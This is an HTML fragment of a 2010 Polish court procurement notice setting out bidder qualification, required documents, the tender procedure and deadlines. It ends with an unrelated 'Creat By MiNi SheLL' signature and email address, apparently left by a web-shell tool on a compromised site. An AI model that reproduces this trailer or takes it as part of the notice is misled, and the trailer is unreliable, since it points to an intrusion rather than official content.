<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże wykonanie w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia   działalności jest krótszy - w tym okresie, co najmniej dwóch dostaw, odpowiadającej swoim zakresem dostawie stanowiącej przedmiot zamówienia o wartości nie mniejszej niż 50 000 zł brutto (słownie: pięćdziesiąt tysięcy złotych) dla zadania I, oraz dwóch dostaw o wartości nie mniejszej niż 150 000 zł brutto (sto pięćdziesiąt tysięcy złotych brutto) dla zadania II.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo do reprezentowania Wykonawcy, z dokładnie określonym zakresem umocowania,  o ile ofertę składa pełnomocnik.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wloclawek.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy we Włocławku, ul. Kilińskiego 20, 87- 800 Włocławek, pok. 109..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2010 godzina 10:00, miejsce: Sąd Rejonowy we Włocławku, ul. Kilińskiego 20, 87- 800 Włocławek, pok. 109..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com